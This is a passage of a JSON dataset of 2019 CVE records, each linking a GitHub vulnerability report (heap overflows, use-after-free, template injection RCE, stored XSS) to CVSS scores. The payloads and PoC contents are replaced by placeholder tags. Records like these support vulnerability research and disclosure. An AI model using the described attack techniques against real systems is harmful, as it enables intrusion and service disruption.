        "description": "heap use after free in APITAG of coders/png.c. Prerequisites X] I have written a descriptive issue title [X] I have verified that I am using the latest version of APITAG [X] I have searched [open URLTAG and closed URLTAG issues to ensure it has not already been reported Description APITAG There is a heap use after free vulnerability in function APITAG of coders/png.c whick can be reproduced as below. Steps to Reproduce APITAG NUMBERTAG e NUMBERTAG fd fd fd fd fd[fd]fd fd fd fd fd fd fd fd fd fd APITAG NUMBERTAG e NUMBERTAG fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd APITAG NUMBERTAG e NUMBERTAG fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd APITAG NUMBERTAG e NUMBERTAG fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd APITAG NUMBERTAG e NUMBERTAG fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd APITAG NUMBERTAG e NUMBERTAG fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd APITAG Shadow byte legend (one shadow byte represents NUMBERTAG application bytes): APITAG Addressable NUMBERTAG APITAG Partially addressable NUMBERTAG APITAG Heap left redzone: fa APITAG Heap right redzone: fb APITAG Freed heap region: fd APITAG Stack left redzone: f1 APITAG Stack mid redzone: f2 APITAG Stack right redzone: f3 APITAG Stack partial redzone: f4 APITAG Stack after return: f5 APITAG Stack use after scope: f8 APITAG Global redzone: f9 APITAG Global init order: f6 APITAG Poisoned by user: f7 APITAG Container overflow: fc APITAG Array cookie: ac APITAG Intra object redzone: bb APITAG APITAG internal: fe APITAG NUMBERTAG ABORTING` System Configuration APITAG APITAG version: Version: APITAG NUMBERTAG Q NUMBERTAG FILETAG Copyright NUMBERTAG APITAG Studio LLC License: FILETAG Features: Cipher DPC HDRI APITAG Delegates (built in): bzlib djvu fftw fontconfig freetype jbig jng jpeg lcms lqr lzma openexr pangocairo png tiff wmf x xml zlib Environment APITAG system, version and so on): Distributor ID: Ubuntu Description: Ubuntu NUMBERTAG LTS Release NUMBERTAG Codename: xenial Additional information: APITAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2019-19957",
        "Issue_Url_old": "https://github.com/mz-automation/libiec61850/issues/197",
        "Issue_Url_new": "https://github.com/mz-automation/libiec61850/issues/197",
        "Repo_new": "mz-automation/libiec61850",
        "Issue_Created_At": "2019-12-24T08:51:15Z",
        "description": "APITAG in APITAG in PATHTAG There is a out bound read vulnerability in APITAG because APITAG doesn't check APITAG , APITAG arguments. So APITAG and APITAG can be very large number. APITAG poc: FILETAG result in gdb: CODETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 6.5,
        "impactScore": 3.6,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2019-19958",
        "Issue_Url_old": "https://github.com/mz-automation/libiec61850/issues/198",
        "Issue_Url_new": "https://github.com/mz-automation/libiec61850/issues/198",
        "Repo_new": "mz-automation/libiec61850",
        "Issue_Created_At": "2019-12-24T09:08:24Z",
        "description": "integer signedness in APITAG in PATHTAG APITAG 's second argument is size which is a signed integer. If attacker supply a negtive number like NUMBERTAG APITAG will try to alloc a very large buffer that is size NUMBERTAG ffffffff in NUMBERTAG bit arch or NUMBERTAG ffffffffffffffff in NUMBERTAG bit arch. Most of the time alloc will failed then memcpy will get segment fault. APITAG poc: FILETAG gdb results: ERRORTAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 6.5,
        "impactScore": 3.6,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2019-19999",
        "Issue_Url_old": "https://github.com/halo-dev/halo/issues/419",
        "Issue_Url_new": "https://github.com/halo-dev/halo/issues/419",
        "Repo_new": "halo-dev/halo",
        "Issue_Created_At": "2019-12-11T10:44:41Z",
        "description": "A Server Side Freemarker template injection vulnerability could cause remote command execution. APITAG I am sure I have checked x] APITAG User Guide Documentation URLTAG FILETAG x] APITAG Wiki URLTAG x] APITAG Issues URLTAG I want to apply FILETAG RCE code is APITAG Then visit an arbitrary ERRORTAG page, this vulnerability is triggered. such as http: PATHTAG FILETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 7.2,
        "impactScore": 5.9,
        "exploitabilityScore": 1.2
    },
    {
        "CVE_ID": "CVE-2019-19999",
        "Issue_Url_old": "https://github.com/halo-dev/halo/issues/440",
        "Issue_Url_new": "https://github.com/halo-dev/halo/issues/440",
        "Repo_new": "halo-dev/halo",
        "Issue_Created_At": "2019-12-24T15:49:53Z",
        "description": "unsafe template file permissions edit cause Server Side Template Injection(SSTI). APITAG \u6211\u786e\u5b9a\u6211\u5df2\u7ecf\u67e5\u770b\u4e86 (\u6807\u6ce8 APITAG \u4e3a APITAG ) ] APITAG \u4f7f\u7528\u6587\u6863 URLTAG FILETAG ] APITAG Wiki \u5e38\u89c1\u95ee\u9898 URLTAG x] [\u5176\u4ed6 Issues URLTAG \u6211\u8981\u7533\u8bf7 (\u6807\u6ce8 APITAG \u4e3a APITAG ) FILETAG Save the file and refresh home page,and then ceye platform can receive a message FILETAG Execute system command also edit \"page APITAG to execute system command to add system user. payload NUMBERTAG APITAG FILETAG save the file again and refresh home page APITAG will add user in the system FILETAG Remark Because the preview does not display the picture properly when editing the issus, you can visit my github project( URLTAG and view the picture. Solution Template files can only be edited locally, or check the file input",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 7.2,
        "impactScore": 5.9,
        "exploitabilityScore": 1.2
    },
    {
        "CVE_ID": "CVE-2019-20008",
        "Issue_Url_old": "https://github.com/archerysec/archerysec/issues/338",
        "Issue_Url_new": "https://github.com/archerysec/archerysec/issues/338",
        "Repo_new": "archerysec/archerysec",
        "Issue_Created_At": "2019-12-03T02:59:59Z",
        "description": "Stored XSS on the scheduler projects list. Upon a security analysis of the platform, a stored cross site scripting vulnerability was identified on the Web and Infrastructure Scan Scheduler's project dropdown selection. The payload is present on the project name attribute, but it is only executed upon javascript interaction by the Select2 library utilized on that specific menu. Upon deletion of the PATHTAG file, the vulnerability was not present anymore (as were the library functionalities). The vulnerability is not present on the python interactions, it is the live search function from select2 that evaluates and (possibly) decodes HTML Entities from the payload. How To Reproduce Steps to reproduce the behavior NUMBERTAG Create a project with the name \" ERRORTAG NUMBERTAG Click \" Launch Scans \" on the left side menu NUMBERTAG Proceed to either \" Dynamic Scans \" or \" Infrastructure Scans NUMBERTAG Click \" Scan Schedule NUMBERTAG Click the project dropdown selection Expected behavior After reproducing the steps above, a pop up should appear prompting the user with NUMBERTAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 5.4,
        "impactScore": 2.7,
        "exploitabilityScore": 2.3
    },
    {
        "CVE_ID": "CVE-2019-20009",
        "Issue_Url_old": "https://github.com/LibreDWG/libredwg/issues/176",
        "Issue_Url_new": "https://github.com/libredwg/libredwg/issues/176",
        "Repo_new": "libredwg/libredwg",
        "Issue_Created_At": "2019-12-24T03:44:32Z",
        "description": "Several bugs found by fuzzing. Hi, After fuzzing libredwg, I found the following bugs on the latest commit on master. Command: dwg2dxf APITAG APITAG input will lead to Memory allocation failed in dwg_decode_SPLINE_private APITAG APITAG URLTAG ASAN says: ERRORTAG Thanks, Linhlhq from Infiniti Team, APITAG (a member of Vingroup)",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 6.5,
        "impactScore": 3.6,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2019-20016",
        "Issue_Url_old": "https://github.com/hoene/libmysofa/issues/84",
        "Issue_Url_new": "https://github.com/hoene/libmysofa/issues/84",
        "Repo_new": "hoene/libmysofa",
        "Issue_Created_At": "2019-10-31T07:31:18Z",
        "description": "There is a stack based buffer overflow in the APITAG function of APITAG NUMBERTAG A crafted input will lead to crash in dataobject.c at libmysofa NUMBERTAG Triggered by ./mysofa2json POC Poc overflow libmysofa2 URLTAG The ASAN information is as follows: ERRORTAG about code: CODETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 6.5,
        "impactScore": 3.6,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2019-20016",
        "Issue_Url_old": "https://github.com/hoene/libmysofa/issues/83",
        "Issue_Url_new": "https://github.com/hoene/libmysofa/issues/83",
        "Repo_new": "hoene/libmysofa",
        "Issue_Created_At": "2019-10-31T07:21:20Z",
        "description": "There is a stack based buffer overflow in the APITAG function of APITAG NUMBERTAG A crafted input will lead to crash in fractalhead.c at libmysofa NUMBERTAG Triggered by ./mysofa2json POC Poc overflow libmysofa1 URLTAG The ASAN information is as follows: ERRORTAG gdb debug info: ERRORTAG about code: ERRORTAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 6.5,
        "impactScore": 3.6,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2019-20017",
        "Issue_Url_old": "https://github.com/tbeu/matio/issues/127",
        "Issue_Url_new": "https://github.com/tbeu/matio/issues/127",
        "Repo_new": "tbeu/matio",
        "Issue_Created_At": "2019-11-07T03:14:45Z",
        "description": "There is a stack based buffer overflow in the APITAG function of APITAG NUMBERTAG A crafted input will lead to crash in mat5.c at matio NUMBERTAG Triggered by ./matdump POC Poc NUMBERTAG stackover APITAG URLTAG The ASAN information is as follows: ERRORTAG about code NUMBERTAG CODETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 6.5,
        "impactScore": 3.6,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2019-20018",
        "Issue_Url_old": "https://github.com/tbeu/matio/issues/129",
        "Issue_Url_new": "https://github.com/tbeu/matio/issues/129",
        "Repo_new": "tbeu/matio",
        "Issue_Created_At": "2019-11-07T03:27:18Z",
        "description": "There is a stack based buffer overflow in the APITAG function of APITAG NUMBERTAG A crafted input will lead to crash in mat5.c at matio NUMBERTAG Triggered by ./matdump POC Poc NUMBERTAG stackoverflow APITAG mat NUMBERTAG URLTAG The ASAN information is as follows: ERRORTAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 6.5,
        "impactScore": 3.6,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2019-20019",
        "Issue_Url_old": "https://github.com/tbeu/matio/issues/130",
        "Issue_Url_new": "https://github.com/tbeu/matio/issues/130",
        "Repo_new": "tbeu/matio",
        "Issue_Created_At": "2019-11-07T03:44:40Z",
        "description": "it is a memory exhaustion issue in APITAG APITAG A crafted input will lead to crash in mat5.c at matio NUMBERTAG Triggered by ./matdump POC Poc APITAG URLTAG The ASAN information is as follows: ERRORTAG about code NUMBERTAG CODETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 6.5,
        "impactScore": 3.6,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2019-20020",
        "Issue_Url_old": "https://github.com/tbeu/matio/issues/128",
        "Issue_Url_new": "https://github.com/tbeu/matio/issues/128",
        "Repo_new": "tbeu/matio",
        "Issue_Created_At": "2019-11-07T03:23:25Z",
        "description": "There is a stack based buffer overflow in the APITAG function of APITAG NUMBERTAG A crafted input will lead to crash in mat5.c at matio NUMBERTAG Triggered by ./matdump POC Poc NUMBERTAG stackover APITAG mat NUMBERTAG URLTAG The ASAN information is as follows: ERRORTAG about code NUMBERTAG ERRORTAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 6.5,
        "impactScore": 3.6,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2019-20021",
        "Issue_Url_old": "https://github.com/upx/upx/issues/315",
        "Issue_Url_new": "https://github.com/upx/upx/issues/315",
        "Repo_new": "upx/upx",
        "Issue_Created_At": "2019-11-14T03:04:37Z",
        "description": "There is a heap buffer overflow in the APITAG function of APITAG A crafted input will lead to crash in p_mach.cpp at UP NUMBERTAG latest version,git clone from branch devel) Triggered by ./upx.out d f POC OS: Ubuntu NUMBERTAG LTS CPU architecture NUMBERTAG Poc NUMBERTAG URLTAG The ASAN information is as follows: ERRORTAG",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 5.5,
        "impactScore": 3.6,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2019-20022",
        "Issue_Url_old": "https://github.com/saitoha/libsixel/issues/108",
        "Issue_Url_new": "https://github.com/saitoha/libsixel/issues/108",
        "Repo_new": "saitoha/libsixel",
        "Issue_Created_At": "2019-12-11T08:22:08Z",
        "description": "Segmentation fault (ASAN: SEGV on unknown address) in the load_pnm function of APITAG A crafted input will lead to crash in frompnm.c at libsixel NUMBERTAG Triggered by: ./img2sixel NUMBERTAG SEGV load pnm NUMBERTAG Poc NUMBERTAG SEGV load pnm NUMBERTAG URLTAG The gdb debug info: ERRORTAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 6.5,
        "impactScore": 3.6,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2019-20023",
        "Issue_Url_old": "https://github.com/saitoha/libsixel/issues/120",
        "Issue_Url_new": "https://github.com/saitoha/libsixel/issues/120",
        "Repo_new": "saitoha/libsixel",
        "Issue_Created_At": "2019-12-18T05:03:40Z",
        "description": "A memory leaks issue in image_buffer_resize at APITAG A crafted input will lead to crash in frompnm.c at libsixel NUMBERTAG git from the FILETAG ) Triggered by: ./img2sixel NUMBERTAG memleak rpl_malloc Poc NUMBERTAG memleak rpl_malloc URLTAG The ASAN info: ERRORTAG about code: ERRORTAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 6.5,
        "impactScore": 3.6,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2019-20024",
        "Issue_Url_old": "https://github.com/saitoha/libsixel/issues/121",
        "Issue_Url_new": "https://github.com/saitoha/libsixel/issues/121",
        "Repo_new": "saitoha/libsixel",
        "Issue_Created_At": "2019-12-18T05:10:27Z",
        "description": "A heap buffer overflow in image_buffer_resize at APITAG A crafted input will lead to crash in frompnm.c at libsixel NUMBERTAG git from the FILETAG Triggered by: ./img2sixel NUMBERTAG heap Poc NUMBERTAG heap URLTAG The ASAN info: ERRORTAG about code: CODETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 6.5,
        "impactScore": 3.6,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2019-20051",
        "Issue_Url_old": "https://github.com/upx/upx/issues/313",
        "Issue_Url_new": "https://github.com/upx/upx/issues/313",
        "Repo_new": "upx/upx",
        "Issue_Created_At": "2019-11-13T10:02:39Z",
        "description": "Floating point exception abort APITAG in APITAG of APITAG A crafted input will lead to crash in APITAG at UP NUMBERTAG latest version,git clone from master) Triggered by ./upx.out d f POC OS: Ubuntu NUMBERTAG LTS CPU architecture NUMBERTAG Poc NUMBERTAG URLTAG The ASAN information is as follows: ERRORTAG",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 5.5,
        "impactScore": 3.6,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2019-20052",
        "Issue_Url_old": "https://github.com/tbeu/matio/issues/131",
        "Issue_Url_new": "https://github.com/tbeu/matio/issues/131",
        "Repo_new": "tbeu/matio",
        "Issue_Created_At": "2019-11-12T05:36:29Z",
        "description": "it is a memory leaks issue in APITAG APITAG A crafted input will lead to crash in mat5.c at matio NUMBERTAG Triggered by ./matdump POC Poc NUMBERTAG memleak URLTAG The ASAN information is as follows: ERRORTAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 6.5,
        "impactScore": 3.6,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2019-20053",
        "Issue_Url_old": "https://github.com/upx/upx/issues/314",
        "Issue_Url_new": "https://github.com/upx/upx/issues/314",
        "Repo_new": "upx/upx",
        "Issue_Created_At": "2019-11-14T01:57:00Z",
        "description": "Segmentation fault (ASAN: SEGV on unknown address) in the APITAG function of APITAG A crafted input will lead to crash in p_lx_elf.cpp at UP NUMBERTAG latest version,git clone from master) Triggered by ./upx.out d f POC OS: Ubuntu NUMBERTAG LTS CPU architecture NUMBERTAG Poc NUMBERTAG URLTAG The ASAN information is as follows: ERRORTAG",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 5.5,
        "impactScore": 3.6,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2019-20056",
        "Issue_Url_old": "https://github.com/saitoha/libsixel/issues/126",
        "Issue_Url_new": "https://github.com/saitoha/libsixel/issues/126",
        "Repo_new": "saitoha/libsixel",
        "Issue_Created_At": "2019-12-29T13:43:51Z",
        "description": "assertion failure in stbi__shiftsigned in stb_image.h. stbi__shiftsigned has assertion which can be triggered by user supplied image file. FILETAG poc: FILETAG result: ERRORTAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 6.5,
        "impactScore": 3.6,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2019-20057",
        "Issue_Url_old": "https://github.com/ProxymanApp/Proxyman/issues/364",
        "Issue_Url_new": "https://github.com/proxymanapp/proxyman/issues/364",
        "Repo_new": "proxymanapp/proxyman",
        "Issue_Created_At": "2019-12-29T04:38:45Z",
        "description": "Helper Tool: Security Vulnerability . \ud83d\udc36 Brief There is a report from a dedicated user that Proxyman Helper Tool APITAG be exploited to change the System Proxy from unsigned apps. Basically, it's the same issue with Little Snitch CVETAG URLTAG since Proxyman and Little Snitch use a same FILETAG and we don't validate the codesign of incoming APITAG APITAG does good job to demonstrate how to install/uninstall the Help Tool and provide a mechanism to verify which app is authorized to do it. However, it doesn't validate the authenticity of the connections. As a result, Any apps could exploited by sending the connection to Helper Tool, which has the same APITAG We should fix it \ud83d\udc51 Criteria [ ] Validate the codesign of connections before performing any System Change [ ] Make sure one Helper Tool could verify and accept the Proxyman's Connection. [ ] Use POC sample code to verify that the new Helper Tool will reject the unauthorized connections",
        "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:L/A:N",
        "severity": "LOW",
        "baseScore": 3.7,
        "impactScore": 1.4,
        "exploitabilityScore": 2.2
    },
    {
        "CVE_ID": "CVE-2019-20058",
        "Issue_Url_old": "https://github.com/bolt/bolt/issues/7830",
        "Issue_Url_new": "https://github.com/bolt/bolt/issues/7830",
        "Repo_new": "bolt/bolt",
        "Issue_Created_At": "2019-12-17T13:13:09Z",
        "description": "Unauthenticated Stored Cross Site Scripting (XSS) Admin Account Takeover NUMBERTAG Bug Summary: Stored Cross Site Scripting: Cross Site Scripting (XSS) attacks are a type of injection, in which malicious scripts are injected into otherwise benign and trusted websites. XSS attacks occur when an attacker uses a web application to send malicious code, generally in the form of a browser side script, to a different end user. Flaws that allow these attacks to succeed are quite widespread and occur anywhere a web application uses input from a user within the output it generates without validating or encoding it. Scenario: When an end user is searching ( URLTAG for any results logs are being generated in admin panel ( FILETAG an end user inputs malicious payload such as URL Encoded: APITAG Decoded: APITAG Javascript is being executed on Database page of the admin panel ( URLTAG and unauthenticated attacker can use such malicious payloads to perform various exploits and APITAG keylogger, CSRF Token APITAG Aware Keylogger,etc NUMBERTAG Steps to Reproduce: Navigate to URLTAG Click on Search Input payload from above FILETAG To validate the finding login to admin console and navigate to URLTAG and select the log with payload navigate to database ( URLTAG Selecting Logs: FILETAG Navigating to Database: FILETAG Payload Executed: FILETAG NUMBERTAG Mitigation: Encode data on output. At the point where user controllable data is output in HTTP responses, encode the output to prevent it from being interpreted as active content. Depending on the output context, this might require applying combinations of HTML, URL, APITAG and CSS encoding. Filter input on arrival. At the point where user input is received, filter as strictly as possible based on what is expected or valid input. Content Security Policy. As a last line of defense, you can use Content Security Policy (CSP) to reduce the severity of any XSS vulnerabilities that still occur. References: URLTAG url URLTAG url URLTAG url FILETAG URLTAG url",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.1,
        "impactScore": 2.7,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2019-20063",
        "Issue_Url_old": "https://github.com/hoene/libmysofa/issues/67",
        "Issue_Url_new": "https://github.com/hoene/libmysofa/issues/67",
        "Repo_new": "hoene/libmysofa",
        "Issue_Created_At": "2019-08-24T08:52:47Z",
        "description": "Uninitialized use found in mysofa2json FILETAG )",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 8.8,
        "impactScore": 5.9,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2019-20086",
        "Issue_Url_old": "https://github.com/gopro/gpmf-parser/issues/74",
        "Issue_Url_new": "https://github.com/gopro/gpmf-parser/issues/74",
        "Repo_new": "gopro/gpmf-parser",
        "Issue_Created_At": "2019-10-15T07:06:48Z",
        "description": "heap overflow in APITAG APITAG Tested in Ubuntu NUMBERTAG bit, master(ceb NUMBERTAG compiled by gcc g fsanitize=address Triggered by $ gpmf parse $POC POC file FILETAG ERRORTAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 8.8,
        "impactScore": 5.9,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2019-20087",
        "Issue_Url_old": "https://github.com/gopro/gpmf-parser/issues/76",
        "Issue_Url_new": "https://github.com/gopro/gpmf-parser/issues/76",
        "Repo_new": "gopro/gpmf-parser",
        "Issue_Created_At": "2019-10-15T07:16:17Z",
        "description": "heapoverflow in APITAG GPMF APITAG Tested in Ubuntu NUMBERTAG bit, master(ceb NUMBERTAG compiled by gcc g fsanitize=address Triggered by $ gpmf parse $POC POC FILETAG ERRORTAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 8.8,
        "impactScore": 5.9,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2019-20088",
        "Issue_Url_old": "https://github.com/gopro/gpmf-parser/issues/77",
        "Issue_Url_new": "https://github.com/gopro/gpmf-parser/issues/77",
        "Repo_new": "gopro/gpmf-parser",
        "Issue_Created_At": "2019-10-15T07:21:55Z",
        "description": "heap overflow in APITAG APITAG Tested in Ubuntu NUMBERTAG bit, master(ceb NUMBERTAG compiled by gcc g fsanitize=address Triggered by $ gpmf parse $POC POC FILETAG ERRORTAG",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 7.8,
        "impactScore": 5.9,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2019-20089",
        "Issue_Url_old": "https://github.com/gopro/gpmf-parser/issues/75",
        "Issue_Url_new": "https://github.com/gopro/gpmf-parser/issues/75",
        "Repo_new": "gopro/gpmf-parser",
        "Issue_Created_At": "2019-10-15T07:11:52Z",
        "description": "heapoverflow in APITAG APITAG Tested in Ubuntu NUMBERTAG bit, master(ceb NUMBERTAG compiled by gcc g fsanitize=address Triggered by $ gpmf parse $POC FILETAG POC ERRORTAG",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 7.8,
        "impactScore": 5.9,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2019-20090",
        "Issue_Url_old": "https://github.com/axiomatic-systems/Bento4/issues/461",
        "Issue_Url_new": "https://github.com/axiomatic-systems/bento4/issues/461",
        "Repo_new": "axiomatic-systems/bento4",
        "Issue_Created_At": "2019-12-09T08:53:39Z",
        "description": "use after free in APITAG ./mp NUMBERTAG ts $poc out poc FILETAG asan output ERRORTAG",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 7.8,
        "impactScore": 5.9,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2019-20091",
        "Issue_Url_old": "https://github.com/axiomatic-systems/Bento4/issues/462",
        "Issue_Url_new": "https://github.com/axiomatic-systems/bento4/issues/462",
        "Repo_new": "axiomatic-systems/bento4",
        "Issue_Created_At": "2019-12-09T09:00:42Z",
        "description": "2 segv in mp NUMBERTAG ts. ./mp NUMBERTAG ts $poc out poc FILETAG FILETAG asan output NUMBERTAG ERRORTAG NUMBERTAG ERRORTAG",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 5.5,
        "impactScore": 3.6,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2019-20094",
        "Issue_Url_old": "https://github.com/saitoha/libsixel/issues/125",
        "Issue_Url_new": "https://github.com/saitoha/libsixel/issues/125",
        "Repo_new": "saitoha/libsixel",
        "Issue_Created_At": "2019-12-25T00:03:38Z",
        "description": "heap overflow in APITAG img2sixel I $POC FILETAG asan output ERRORTAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 8.8,
        "impactScore": 5.9,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2019-20140",
        "Issue_Url_old": "https://github.com/saitoha/libsixel/issues/122",
        "Issue_Url_new": "https://github.com/saitoha/libsixel/issues/122",
        "Repo_new": "saitoha/libsixel",
        "Issue_Created_At": "2019-12-22T13:23:47Z",
        "description": "heap buffer overflow in gif_out_code at APITAG version : img2sixel NUMBERTAG OS : Ubuntu NUMBERTAG configured with: libcurl: yes libpng: yes libjpeg: yes gdk pixbuf2: no GD: no There is a heap buffer overflow in gif_out_code at APITAG please run following cmd to reproduce it. APITAG poc URLTAG ASAN LOG ERRORTAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 8.8,
        "impactScore": 5.9,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2019-20149",
        "Issue_Url_old": "https://github.com/jonschlinkert/kind-of/issues/30",
        "Issue_Url_new": "https://github.com/jonschlinkert/kind-of/issues/30",
        "Repo_new": "jonschlinkert/kind-of",
        "Issue_Created_At": "2019-12-16T01:04:23Z",
        "description": "A vulnerability in APITAG We found that a maliciously crafted user input object can type checking result of kind of module. The vulnerability is from the following code: kind of leverages the built in constructor of unsafe user input to detect type information. However, a crafted payload can overwrite this builtin attribute to manipulate the type detection result. URLTAG Reproduce Script CODETAG This issue can be fixed by adding one simply check to the APITAG function: check ERRORTAG . This check can patch the vulnerability because attackers can't use json to send function instances to the victim server.",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2019-20159",
        "Issue_Url_old": "https://github.com/gpac/gpac/issues/1321",
        "Issue_Url_new": "https://github.com/gpac/gpac/issues/1321",
        "Repo_new": "gpac/gpac",
        "Issue_Created_At": "2019-10-28T16:03:11Z",
        "description": "APITAG NUMBERTAG memory leaks of APITAG System info: Ubuntu NUMBERTAG LTS NUMBERTAG gcc NUMBERTAG gpac (master NUMBERTAG ada NUMBERTAG e) Compile Command: APITAG Run Command: APITAG POC file: URLTAG ASAN info: ERRORTAG",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 5.5,
        "impactScore": 3.6,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2019-20160",
        "Issue_Url_old": "https://github.com/gpac/gpac/issues/1334",
